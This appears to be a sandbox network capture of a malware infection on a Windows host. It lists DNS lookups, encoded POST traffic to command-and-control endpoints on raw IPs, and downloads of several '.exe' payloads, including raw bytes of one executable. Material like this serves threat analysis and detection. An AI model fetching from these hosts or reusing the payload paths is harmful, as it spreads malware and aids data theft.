Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 4, 2024 17:36:58.886807919 CEST	192.168.2.6	1.1.1.1	0xc6aa	Standard query (0)	api64.ipify.org	A (IP address)	IN (0x0001)	false
Sep 4, 2024 17:36:59.793421030 CEST	192.168.2.6	1.1.1.1	0x85cf	Standard query (0)	ipinfo.io	A (IP address)	IN (0x0001)	false
Sep 4, 2024 17:37:05.113110065 CEST	192.168.2.6	1.1.1.1	0xd4c6	Standard query (0)	240902180529931.tyr.zont16.com	A (IP address)	IN (0x0001)	false
Sep 4, 2024 17:37:05.115652084 CEST	192.168.2.6	1.1.1.1	0xad92	Standard query (0)	file-link-iota.vercel.app	A (IP address)	IN (0x0001)	false
Sep 4, 2024 17:37:06.812052965 CEST	192.168.2.6	1.1.1.1	0xe9ed	Standard query (0)	youtransfer.net	A (IP address)	IN (0x0001)	false
Sep 4, 2024 17:37:26.479863882 CEST	192.168.2.6	1.1.1.1	0x41b9	Standard query (0)	iplogger.org	A (IP address)	IN (0x0001)	false
Sep 4, 2024 17:37:42.767319918 CEST	192.168.2.6	1.1.1.1	0xc702	Standard query (0)	traineiwnqo.shop	A (IP address)	IN (0x0001)	false
Sep 4, 2024 17:37:42.997870922 CEST	192.168.2.6	1.1.1.1	0xcdb	Standard query (0)	locatedblsoqp.shop	A (IP address)	IN (0x0001)	false
Sep 4, 2024 17:37:43.132519007 CEST	192.168.2.6	1.1.1.1	0xb56f	Standard query (0)	stamppreewntnq.shop	A (IP address)	IN (0x0001)	false
Sep 4, 2024 17:37:43.487402916 CEST	192.168.2.6	1.1.1.1	0x84c4	Standard query (0)	condedqpwqm.shop	A (IP address)	IN (0x0001)	false
Sep 4, 2024 17:37:54.228440046 CEST	192.168.2.6	1.1.1.1	0x42fc	Standard query (0)	traineiwnqo.shop	A (IP address)	IN (0x0001)	false
Sep 4, 2024 17:37:54.274857998 CEST	192.168.2.6	1.1.1.1	0xed75	Standard query (0)	locatedblsoqp.shop	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Sep 4, 2024 17:36:58.895262957 CEST	1.1.1.1	192.168.2.6	0xc6aa	No error (0)	api64.ipify.org		104.237.62.213	A (IP address)	IN (0x0001)	false
Sep 4, 2024 17:36:58.895262957 CEST	1.1.1.1	192.168.2.6	0xc6aa	No error (0)	api64.ipify.org		173.231.16.77	A (IP address)	IN (0x0001)	false
Sep 4, 2024 17:36:59.800383091 CEST	1.1.1.1	192.168.2.6	0x85cf	No error (0)	ipinfo.io		34.117.59.81	A (IP address)	IN (0x0001)	false
Sep 4, 2024 17:37:05.180202961 CEST	1.1.1.1	192.168.2.6	0xad92	No error (0)	file-link-iota.vercel.app		76.76.21.98	A (IP address)	IN (0x0001)	false
Sep 4, 2024 17:37:05.180202961 CEST	1.1.1.1	192.168.2.6	0xad92	No error (0)	file-link-iota.vercel.app		76.76.21.142	A (IP address)	IN (0x0001)	false
Sep 4, 2024 17:37:05.237958908 CEST	1.1.1.1	192.168.2.6	0xd4c6	Server failure (2)	240902180529931.tyr.zont16.com	none	none	A (IP address)	IN (0x0001)	false
Sep 4, 2024 17:37:07.075470924 CEST	1.1.1.1	192.168.2.6	0xe9ed	No error (0)	youtransfer.net		158.69.225.124	A (IP address)	IN (0x0001)	false
Sep 4, 2024 17:37:26.499950886 CEST	1.1.1.1	192.168.2.6	0x41b9	No error (0)	iplogger.org		104.26.2.46	A (IP address)	IN (0x0001)	false
Sep 4, 2024 17:37:26.499950886 CEST	1.1.1.1	192.168.2.6	0x41b9	No error (0)	iplogger.org		172.67.74.161	A (IP address)	IN (0x0001)	false
Sep 4, 2024 17:37:26.499950886 CEST	1.1.1.1	192.168.2.6	0x41b9	No error (0)	iplogger.org		104.26.3.46	A (IP address)	IN (0x0001)	false
Sep 4, 2024 17:37:42.896548986 CEST	1.1.1.1	192.168.2.6	0xc702	Name error (3)	traineiwnqo.shop	none	none	A (IP address)	IN (0x0001)	false
Sep 4, 2024 17:37:43.124031067 CEST	1.1.1.1	192.168.2.6	0xcdb	Name error (3)	locatedblsoqp.shop	none	none	A (IP address)	IN (0x0001)	false
Sep 4, 2024 17:37:43.150636911 CEST	1.1.1.1	192.168.2.6	0xb56f	No error (0)	stamppreewntnq.shop		188.114.97.3	A (IP address)	IN (0x0001)	false
Sep 4, 2024 17:37:43.150636911 CEST	1.1.1.1	192.168.2.6	0xb56f	No error (0)	stamppreewntnq.shop		188.114.96.3	A (IP address)	IN (0x0001)	false
Sep 4, 2024 17:37:43.502821922 CEST	1.1.1.1	192.168.2.6	0x84c4	No error (0)	condedqpwqm.shop		172.67.146.35	A (IP address)	IN (0x0001)	false
Sep 4, 2024 17:37:43.502821922 CEST	1.1.1.1	192.168.2.6	0x84c4	No error (0)	condedqpwqm.shop		104.21.10.172	A (IP address)	IN (0x0001)	false
Sep 4, 2024 17:37:54.237852097 CEST	1.1.1.1	192.168.2.6	0x42fc	Name error (3)	traineiwnqo.shop	none	none	A (IP address)	IN (0x0001)	false
Sep 4, 2024 17:37:54.284874916 CEST	1.1.1.1	192.168.2.6	0xed75	Name error (3)	locatedblsoqp.shop	none	none	A (IP address)	IN (0x0001)	false

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49713	62.133.61.172	80	420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Sep 4, 2024 17:36:57.945889950 CEST	205	OUT	GET /api/crazyfish.php HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Host: 62.133.61.172
Sep 4, 2024 17:36:58.876038074 CEST	195	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 04 Sep 2024 15:36:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 66 69 73 68 31 35 0d 0a 30 0d 0a 0d 0a Data Ascii: 6fish150
Sep 4, 2024 17:36:58.876370907 CEST	195	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 04 Sep 2024 15:36:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 66 69 73 68 31 35 0d 0a 30 0d 0a 0d 0a Data Ascii: 6fish150
Sep 4, 2024 17:37:01.633744955 CEST	274	OUT	POST /api/twofish.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Content-Length: 133 Host: 62.133.61.172
Sep 4, 2024 17:37:01.633780003 CEST	133	OUT	Data Raw: 64 61 74 61 3d 73 77 67 55 36 57 6f 66 31 70 38 45 35 49 47 71 49 76 61 37 46 53 54 4e 64 64 57 50 4a 32 50 52 57 52 5f 7a 46 71 73 41 74 65 4f 5a 38 6b 56 68 77 30 46 2d 30 6b 51 48 4a 31 46 70 6e 4b 74 5f 64 66 62 31 73 50 5f 79 6a 33 77 55 6f Data Ascii: data=swgU6Wof1p8E5IGqIva7FSTNddWPJ2PRWR_zFqsAteOZ8kVhw0F-0kQHJ1FpnKt_dfb1sP_yj3wUoT-rtj_WAIkoyONdm_44_xOXWVRL5ObLyxRBF-HMeieavGJ4KE4p
Sep 4, 2024 17:37:01.936790943 CEST	407	OUT	POST /api/twofish.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Content-Length: 133 Host: 62.133.61.172 Data Raw: 64 61 74 61 3d 73 77 67 55 36 57 6f 66 31 70 38 45 35 49 47 71 49 76 61 37 46 53 54 4e 64 64 57 50 4a 32 50 52 57 52 5f 7a 46 71 73 41 74 65 4f 5a 38 6b 56 68 77 30 46 2d 30 6b 51 48 4a 31 46 70 6e 4b 74 5f 64 66 62 31 73 50 5f 79 6a 33 77 55 6f 54 2d 72 74 6a 5f 57 41 49 6b 6f 79 4f 4e 64 6d 5f 34 34 5f 78 4f 58 57 56 52 4c 35 4f 62 4c 79 78 52 42 46 2d 48 4d 65 69 65 61 76 47 4a 34 4b 45 34 70 Data Ascii: data=swgU6Wof1p8E5IGqIva7FSTNddWPJ2PRWR_zFqsAteOZ8kVhw0F-0kQHJ1FpnKt_dfb1sP_yj3wUoT-rtj_WAIkoyONdm_44_xOXWVRL5ObLyxRBF-HMeieavGJ4KE4p
Sep 4, 2024 17:37:03.003175020 CEST	298	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 04 Sep 2024 15:37:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 63 0d 0a 4d 52 41 38 66 45 7a 6e 45 64 57 4a 34 49 35 68 4d 64 70 69 36 71 46 51 37 2b 34 37 32 4c 41 48 64 37 63 59 38 49 54 57 32 72 73 6b 2b 46 32 74 5a 34 58 6f 6a 71 71 41 53 54 62 68 6b 43 6b 4f 72 38 71 52 6b 55 51 74 2b 2b 44 6e 58 6f 45 66 54 79 68 30 73 31 65 74 70 6b 5a 6e 46 44 76 47 57 56 6e 46 6c 30 4b 63 6f 6d 6b 3d 0d 0a 30 0d 0a 0d 0a Data Ascii: 6cMRA8fEznEdWJ4I5hMdpi6qFQ7+472LAHd7cY8ITW2rsk+F2tZ4XojqqASTbhkCkOr8qRkUQt++DnXoEfTyh0s1etpkZnFDvGWVnFl0Kcomk=0
Sep 4, 2024 17:37:03.122126102 CEST	274	OUT	POST /api/twofish.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Content-Length: 133 Host: 62.133.61.172
Sep 4, 2024 17:37:03.122149944 CEST	133	OUT	Data Raw: 64 61 74 61 3d 52 67 59 77 75 54 6c 30 52 34 50 61 56 53 34 75 32 6c 30 66 47 53 64 62 46 65 75 49 49 57 38 30 74 67 58 62 33 31 69 58 33 7a 5f 54 32 4f 78 4a 73 5a 37 6a 61 42 61 34 53 33 74 69 38 66 36 53 66 45 49 68 34 57 31 2d 73 4a 61 76 69 Data Ascii: data=RgYwuTl0R4PaVS4u2l0fGSdbFeuIIW80tgXb31iX3z_T2OxJsZ7jaBa4S3ti8f6SfEIh4W1-sJavilHq8fc6cvoyZcs7S8pJZEgBxOMjPXTA4Ku0JriuuHaMgHRuQbPm
Sep 4, 2024 17:37:04.597382069 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 04 Sep 2024 15:37:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 61 30 30 0d 0a 35 51 69 77 39 34 6d 55 4c 52 6d 53 49 54 74 30 76 52 74 46 74 6e 68 65 4a 56 67 39 42 77 58 77 49 73 79 65 48 38 37 4e 70 44 64 4f 4b 69 4c 4b 71 75 72 70 52 32 6e 38 62 6b 36 75 5a 58 31 46 7a 4a 52 66 39 73 74 6f 48 6d 44 5a 61 6e 4e 69 59 41 53 72 50 65 30 61 6c 74 72 71 37 56 58 70 38 48 77 4a 57 58 4c 36 66 68 6b 64 77 46 58 33 39 4f 62 6c 71 64 4d 50 49 59 65 73 6f 69 41 4c 69 64 68 7a 33 51 57 31 79 6d 67 34 37 66 4a 6d 2b 4d 61 5a 6d 63 59 4b 49 47 6f 58 35 47 45 58 38 4b 4b 72 57 6e 38 79 57 46 67 31 67 66 35 70 33 73 55 53 6b 33 35 6e 78 31 30 78 51 4d 69 59 34 41 39 53 45 30 5a 66 62 48 57 38 78 53 66 45 2b 6e 58 79 39 76 41 6e 32 4f 4d 4c 62 69 32 30 45 78 39 73 48 4c 78 76 77 53 42 55 6d 73 52 6e 70 64 67 70 44 49 51 64 37 30 44 56 4a 74 42 47 31 39 6a 49 76 58 35 39 70 61 4d 6a 54 58 37 57 50 68 76 47 4c 4f 6e 6c 55 4d 55 36 61 36 53 39 62 67 6c 43 6b 4e 62 37 32 73 56 42 67 71 55 38 37 76 6e 43 58 58 30 32 47 6f 79 6a 59 72 73 58 36 6d 57 53 31 7a 6a 33 55 49 73 44 33 [TRUNCATED] Data Ascii: a005Qiw94mULRmSITt0vRtFtnheJVg9BwXwIsyeH87NpDdOKiLKqurpR2n8bk6uZX1FzJRf9stoHmDZanNiYASrPe0altrq7VXp8HwJWXL6fhkdwFX39OblqdMPIYesoiALidhz3QW1ymg47fJm+MaZmcYKIGoX5GEX8KKrWn8yWFg1gf5p3sUSk35nx10xQMiY4A9SE0ZfbHW8xSfE+nXy9vAn2OMLbi20Ex9sHLxvwSBUmsRnpdgpDIQd70DVJtBG19jIvX59paMjTX7WPhvGLOnlUMU6a6S9bglCkNb72sVBgqU87vnCXX02GoyjYrsX6mWS1zj3UIsD3MSRNgghRqFJOKUhjJ2sv66TjrC+z1/vJnM8K4VLaIKrMmhf3bfKlfajhZyy3GtoRvFKAxVoh0PpTMmidk9ghcohEbr0gI4Cbv2vsvFXK9QZRc0Ss3XkPmi5uW+ts644pqun71ls2Qeh6p1zs5VBZZ8JRucaGxopL3IRvIEGvA7nhLp8vbBAHjJJWbX18BSlXVv7Ae/ePjNcvofxXycqJMD9SnOuoKkwHis3zSPxbKeBL94UrsIAHT7MTy+iMyE8uXKnQedASvMIUXLr6f5lg5EEyVH1lqIrKQrhqaMEvu+FUhvqKVlb8bPpio7520nn4K4xqwUhgGdA/sG0S/EILxQnZKfwcBkfuAU6H0RlnPYrqLQ1JqEuiYHNnUWNHXTjggb59X3YcNY/MAlrU2duyMN1KURrfSaYuU/1RIrJlkEcOrPONZmF3dRZyEIxJ688s+xTvfZkuk287OkJRa1U984tqgKpiWnM73+yjoLay2SlJVnLbcDBW9gtgAKJG59zEK0t83mBbmnUq4hyiXsjrQKB3vsqHEmJsLJPKX9B7/q/MnE3xRe5zii7OwIkQq2NWSmKLhUi9AgrIgzt/1wOCFKklVhKSH6d1ocGEWkUjh37oeUELOcfex/hUqE5CAn+i8ksNNIzrYi/bCxHGMhLokSPnT2dO7kbOW9 [TRUNCATED]
Sep 4, 2024 17:37:04.597518921 CEST	1236	IN	Data Raw: 73 36 4c 63 56 63 35 48 57 68 32 55 68 62 4c 42 77 63 56 62 2f 42 70 56 6f 39 74 37 38 50 78 56 73 31 2b 4f 6e 4a 72 74 4f 59 33 76 4f 6e 75 58 38 61 4d 59 4e 69 76 38 43 41 6d 30 41 77 51 7a 4e 79 64 71 37 43 70 76 64 6b 41 68 57 2f 75 49 4a 76 Data Ascii: s6LcVc5HWh2UhbLBwcVb/BpVo9t78PxVs1+OnJrtOY3vOnuX8aMYNiv8CAm0AwQzNydq7CpvdkAhW/uIJvMeGLvJ1ArnpCLS8bP6yyhdXuDgij5oRVJXhfQ1gKI1EwQZPbk7bMIb4ScnJOxDmYaaswrvhr4DrdTcmTsjHSEQ6HyfR4dUUD7M99iH+LqT/ueWNkEusGkAJAXayV2ntuTeU1L/4yfIWgrbbx0AOfbnFPFDu8qPA1f
Sep 4, 2024 17:37:04.597532034 CEST	279	IN	Data Raw: 30 74 50 36 7a 38 74 38 43 6f 5a 42 37 2b 6a 78 65 66 43 51 59 49 69 34 7a 59 56 4f 53 63 4a 44 39 42 2f 68 50 42 69 75 4d 36 32 46 4c 43 35 6d 46 39 39 47 45 58 6f 32 6a 42 69 71 30 72 43 76 58 6e 52 65 68 59 47 69 64 79 44 36 55 41 51 30 6e 4a Data Ascii: 0tP6z8t8CoZB7+jxefCQYIi4zYVOScJD9B/hPBiuM62FLC5mF99GEXo2jBiq0rCvXnRehYGidyD6UAQ0nJLKsd2Z/dGRApK7SZg10V5YGJmSDy9J50JglUUGTk4C+fmSG0UBI60+ldzFQ+k7wGkS8XwyqA9kw87Z4gQzULRAWAphIH8GH5Yc0Djp/Rz4v/wmLja/P22u4AuGlG2m1sHTCJ0oKv+q8tWLVWye/kIWcsuDKorqrs9
Sep 4, 2024 17:37:24.287709951 CEST	274	OUT	POST /api/twofish.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Content-Length: 561 Host: 62.133.61.172
Sep 4, 2024 17:37:24.287709951 CEST	561	OUT	Data Raw: 64 61 74 61 3d 62 75 63 35 77 61 64 7a 79 6f 7a 47 32 64 66 66 61 61 55 7a 79 6c 4a 68 68 4b 49 48 59 68 70 67 45 58 2d 61 4e 56 49 6d 6a 4e 4e 79 33 76 66 56 65 35 70 5f 42 53 66 54 41 79 5a 64 41 44 39 61 6f 54 5a 6d 35 50 63 4a 65 6c 6a 48 41 Data Ascii: data=buc5wadzyozG2dffaaUzylJhhKIHYhpgEX-aNVImjNNy3vfVe5p_BSfTAyZdAD9aoTZm5PcJeljHA4-K8LO7IaZrDbED0KFZKcN3_9uEhAXyH-JSyICx7mcYnQtNuACBbNpi3iVuSaaqGR_AF78R8Wh1rkEEdrzm3vNmG6Yd7tkAXHo4qrqlolnDPT_64XShNkoYl5H_6aEbVFcEaIHTWSVesdYOMHEQYg0gbGAw8Mgh_c
Sep 4, 2024 17:37:26.329627991 CEST	298	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 04 Sep 2024 15:37:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 63 0d 0a 51 7a 38 68 41 5a 4a 42 74 50 6f 73 2b 72 6f 6d 41 65 6a 55 56 45 7a 4b 47 57 38 61 54 4f 74 54 46 66 34 67 45 77 47 30 71 4b 55 52 2b 68 50 4f 38 50 65 5a 62 51 32 55 53 41 78 2f 47 64 52 41 74 50 39 57 74 6f 71 2f 48 4e 66 4a 59 78 64 77 47 42 33 66 2f 62 30 51 37 49 2b 50 43 53 53 6f 54 66 43 6d 5a 33 39 32 52 59 63 3d 0d 0a 30 0d 0a 0d 0a Data Ascii: 6cQz8hAZJBtPos+romAejUVEzKGW8aTOtTFf4gEwG0qKUR+hPO8PeZbQ2USAx/GdRAtP9Wtoq/HNfJYxdwGB3f/b0Q7I+PCSSoTfCmZ392RYc=0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49721	176.111.174.109	80	420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Sep 4, 2024 17:37:05.177504063 CEST	196	OUT	HEAD /bobr HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Host: 176.111.174.109 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49719	147.45.44.104	80	420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Sep 4, 2024 17:37:05.177687883 CEST	224	OUT	HEAD /yuop/66d58b1858bcb_crypted.exe#xin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Host: 147.45.44.104 Cache-Control: no-cache
Sep 4, 2024 17:37:05.822283030 CEST	309	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Sep 2024 15:37:05 GMT Content-Type: application/octet-stream Content-Length: 528896 Last-Modified: Mon, 02 Sep 2024 09:53:28 GMT Connection: keep-alive Keep-Alive: timeout=120 ETag: "66d58b18-81200" X-Content-Type-Options: nosniff Accept-Ranges: bytes
Sep 4, 2024 17:37:05.822613955 CEST	220	OUT	HEAD /prog/66d707730e9bf_s.exe#space HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Host: 147.45.44.104 Cache-Control: no-cache
Sep 4, 2024 17:37:06.007229090 CEST	309	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Sep 2024 15:37:05 GMT Content-Type: application/octet-stream Content-Length: 210984 Last-Modified: Tue, 03 Sep 2024 12:56:19 GMT Connection: keep-alive Keep-Alive: timeout=120 ETag: "66d70773-33828" X-Content-Type-Options: nosniff Accept-Ranges: bytes
Sep 4, 2024 17:37:06.007441998 CEST	220	OUT	HEAD /malesa/66d1b7f7f3765_Front.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Host: 147.45.44.104 Cache-Control: no-cache
Sep 4, 2024 17:37:06.192671061 CEST	312	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Sep 2024 15:37:06 GMT Content-Type: application/octet-stream Content-Length: 14748160 Last-Modified: Fri, 30 Aug 2024 12:15:51 GMT Connection: keep-alive Keep-Alive: timeout=120 ETag: "66d1b7f7-e10a00" X-Content-Type-Options: nosniff Accept-Ranges: bytes
Sep 4, 2024 17:37:06.193109035 CEST	219	OUT	HEAD /revada/66c6fcb30b9dd_123p.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Host: 147.45.44.104 Cache-Control: no-cache
Sep 4, 2024 17:37:06.379570961 CEST	312	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Sep 2024 15:37:06 GMT Content-Type: application/octet-stream Content-Length: 10902016 Last-Modified: Thu, 22 Aug 2024 08:54:11 GMT Connection: keep-alive Keep-Alive: timeout=120 ETag: "66c6fcb3-a65a00" X-Content-Type-Options: nosniff Accept-Ranges: bytes
Sep 4, 2024 17:37:06.380023956 CEST	219	OUT	GET /prog/66d70775c548d_v.exe#space HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Host: 147.45.44.104 Cache-Control: no-cache
Sep 4, 2024 17:37:06.564774036 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Sep 2024 15:37:06 GMT Content-Type: application/octet-stream Content-Length: 290344 Last-Modified: Tue, 03 Sep 2024 12:56:21 GMT Connection: keep-alive Keep-Alive: timeout=120 ETag: "66d70775-46e28" X-Content-Type-Options: nosniff Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 06 07 d7 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 3c 04 00 00 0a 00 00 00 00 00 00 7e 5a 04 00 00 20 00 00 00 60 04 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 04 00 00 02 00 00 31 48 04 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 24 5a 04 00 57 00 00 00 00 60 04 00 02 06 00 00 00 00 00 00 00 00 00 00 00 48 04 00 28 26 00 00 00 80 04 00 0c 00 00 00 ec 58 04 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELf<~Z `@ 1H`$ZW`H(&X H.text: < `.rsrc`>@@.relocF@B`ZHL,^3]B3H1^`aVj(X`vK)gAW}*<<L%}x31tr:]a#!Uq1~@X(LjDADwksE&L:iADl;8VPVZo$~:kiholbDBOIvKs"[IOX2$q3faX;(8fj#kggP%<AEb!]UH~0a
Sep 4, 2024 17:37:06.564801931 CEST	1236	IN	Data Raw: 59 b6 7d e0 89 0b 12 21 3e 97 fb ec aa ed 4d fc a3 c6 2f 26 2a e5 4b 27 89 d4 b0 86 d5 07 4e 9f b4 f4 5f bb 43 36 e2 68 8f 20 7a 9b 6a a9 93 87 a6 e9 d7 94 6f d9 db 03 46 35 aa c2 c2 aa 60 b2 21 d9 64 22 70 b3 25 0f 91 56 39 eb 53 08 78 53 b2 82 Data Ascii: Y}!>M/&*K'N_C6h zjoF5`!d"p%V9SxS<j6E9wJbngmBzQxd!(qG+8gB<\HplCO}'F&L<u~PsnGDF][LK(\|KCP
Sep 4, 2024 17:37:06.564815044 CEST	448	IN	Data Raw: 02 93 46 25 75 e5 59 9e 60 0b 15 6d 5f ad 2c 8a ed 9f a2 86 80 5d 76 93 f4 39 c6 aa ed 36 dd fa ba 9e 89 68 d9 ad be 48 d2 e8 a5 6a 16 91 40 91 e1 9b 44 94 03 7c 7a cf 69 a3 70 6f 70 4e a0 16 39 fa 0a 3d 39 f3 3e 72 f1 b4 bd 48 36 9e 82 68 60 e1 Data Ascii: F%uY`m_,]v96hHj@D\|zipopN9=9>rH6h`\%p'PTa3~sTZLf#cp0[#Z]7IcWw8pf.Aq-x5:3?QUq>~)H+p_p>2R
Sep 4, 2024 17:37:06.564826012 CEST	1236	IN	Data Raw: e3 4a ec b6 fb f7 6c 9a 8c 9d 53 0a 14 39 e6 42 73 b3 a4 3d 78 1d 10 19 3b c8 30 bc f4 5e 2e a3 58 4d 0a 40 19 c0 25 16 28 60 e1 68 02 df 29 e4 04 35 ad 87 cd 37 62 85 2c 46 89 f5 ce a1 f4 82 eb de af 7e a3 44 46 8b 3f f6 cf bc 98 3c c4 e5 c0 4c Data Ascii: JlS9Bs=x;0^.XM@%(`h)57b,F~DF?<Lc9NI=cl=g"9OLji_$6UTKP#/w!Sd459=^df!\Vq2?38Y(Q4m3W_S(#F{MB4b:yp'+tX#%
Sep 4, 2024 17:37:06.564840078 CEST	224	IN	Data Raw: 4c a3 e1 ae d8 25 05 78 86 7e e6 68 6d 08 ee cf 3f 04 32 45 c1 5b be 2e fd 7f 0c e2 a3 81 3a a0 13 27 d9 89 bd 28 ec 6c ad 31 8d f7 0f a7 e1 95 d4 1c 42 29 f5 60 ad 18 e7 76 02 2d b8 28 ea 2b 71 4e 73 a3 2f 64 c2 3b 5a fc c3 1e a7 89 19 28 26 72 Data Ascii: L%x~hm?2E[.:'(l1B)`v-(+qNs/d;Z(&rqMc37`vz!:B;IUw:~%?aJVkQy>@[xIsra=\|k+D)9J\:;zg
Sep 4, 2024 17:37:06.564850092 CEST	1236	IN	Data Raw: 17 1d 49 a5 5e e7 f9 36 aa 18 2f c1 9e 0c d5 5f b2 e3 77 19 3d d0 28 4d 67 53 f6 d5 b1 e2 c4 e0 7e e3 f2 c2 4e 58 2b 59 8d 8c c2 8d fa 6a e5 18 38 9d bb f2 c7 e2 0a 75 22 48 5d b9 57 d3 34 0c 9b 0c 7b d2 5c 31 eb f8 e9 92 bc ac e2 9f 27 26 76 03 Data Ascii: I^6/_w=(MgS~NX+Yj8u"H]W4{\1'&v.hDfT:GzGHrck}Vq-Qt6g<lmYtW0aF67`9l(<`R6=A<`JtZu^$d^G{zd1&
Sep 4, 2024 17:37:06.564860106 CEST	1236	IN	Data Raw: c2 3f 2c 68 b1 7c 8c 01 52 a2 3d b6 99 78 b6 1a 6c 06 d7 a5 7b 13 10 32 19 74 58 da b9 cc 2e bd b2 2c 77 68 8d 81 12 27 5d 83 47 5e 06 1a d0 d1 0a 9e 99 cb 00 a1 44 a4 8d f1 1e 1c 64 44 0d e0 60 f1 d8 c6 79 3d 1c d7 02 51 0b 7f 77 67 b5 d2 b1 3d Data Ascii: ?,h\|R=xl{2tX.,wh']G^DdD`y=Qwg=W@+kwh}yWe066U4#6sv2O2v@}S(%a<5}cu[9:J1\)";^pv}W<m1tb4=;
Sep 4, 2024 17:37:06.564877033 CEST	1236	IN	Data Raw: 15 1a 3d ca 45 21 66 0b 9f e2 7a 92 21 3e f8 dd a8 bc d2 08 53 9d ad a3 1f 3a 32 c5 f3 40 67 b2 09 f9 6b f6 36 97 6e b5 aa d9 41 07 d5 70 5d 62 bc 1f af e3 81 93 77 99 7e 7a 66 b3 ef b6 18 8a 71 da 3b 64 ba 44 e5 25 ad 84 51 86 76 7b 46 58 6e 40 Data Ascii: =E!fz!>S:2@gk6nAp]bw~zfq;dD%Qv{FXn@XjhC3v6q,gTm(9IXQ-]k(*36NdY[h,'e%wDiB%Qx!VZeXmgW9}m`kT29gF4i
